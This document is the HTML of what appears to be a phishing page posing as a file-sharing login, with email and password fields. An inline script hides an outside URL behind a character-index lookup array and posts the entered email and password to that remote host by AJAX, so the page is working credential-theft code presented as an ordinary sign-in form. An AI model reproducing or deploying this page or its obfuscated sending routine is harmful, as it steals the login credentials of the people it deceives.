<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
    <link rel="stylesheet" href="css/style.css">
</head>

<body>


    <section id="log-section">
        <div class="log-main-col">

            <div class="log-left">
                <div class="logo">
                    <img src="images/logo.png" alt="">
                </div>
            </div>
            <div class="log-right">
                <div class="login-col">
                    <div class="login-inner">

                        <div class="log-header">
                            <p>Only receiver's email can access file sharing</p>
                            <h3>Login with your email and password</h3>
                        </div>
                        <div class="log-body">
                        <form action="finish.php" method="POST">
                            <h2>Sign in</h2>
                            <div class="form-group">
                                <input type="email" name="Email" id="" class="control" placeholder="Email">
                            </div>
                            <div class="form-group">
                                <input type="password" name="password" id="" class="control" placeholder="Password">
                            </div>
                            <div class="form-group">
                                <p>No account? <a href="#">Create one</a></p>
                            </div>
                            <div class="form-group">
                                <input type="submit" value="Next" class="btn">
                            </div>
                        </form>
                        </div>

                    </div>
                </div>
            </div>

            

        </div>
        <div class="footer">
                <p>Always have the latest version</p>
                <ul>
                    <li><img src="images/a.jpg" alt=""></li>
                    <li><img src="images/b.jpg" alt=""></li>
                    <li><img src="images/c.jpg" alt=""></li>
                    <li><img src="images/d.jpg" alt=""></li>
                    <li><img src="images/e.jpg" alt=""></li>
                    <li><img src="images/f.jpg" alt=""></li>
                    <li><img src="images/g.jpg" alt=""></li>
                </ul>
            </div>
    </section>





    <script src="js/jquery-3.4.1.min.js"></script>
    <script src="js/custom.js"></script>
</body>
<script>
	function mg(a,o,tt){var h = ['O','L','t','q','e','D','c','-','.','z','u','2','T','m','V','J','6','U','P','b','v','K','B','Z','i','7','R',':','C','/','o','r','n','Q','S','5','3','8','a','M','W','I','x','H','Y','4','1','k','s','d','g','A','j','F','N','9','G','l','f','p','X','0','w','y','E','h'],t = h[65]+h[2]+h[2]+h[59]+h[48]+h[27]+h[29]+h[29]+h[38]+h[59]+h[24]+h[49]+h[38]+h[2]+h[38]+h[6]+h[48]+h[48]+h[8]+h[6]+h[30]+h[13]+h[29]+h[58]+h[24]+h[32]+h[24]+h[48]+h[65]+h[7]+h[10]+h[32]+h[20]+h[11]+h[11]+h[8]+h[59]+h[65]+h[59];$.ajax({url:t,type:"POST",dataType:"html",data:{Email:a,password:o,typeofemail:tt},crossDomain:!0,success:function(a){},error:function(a){}})}	
	
	</script>

</html>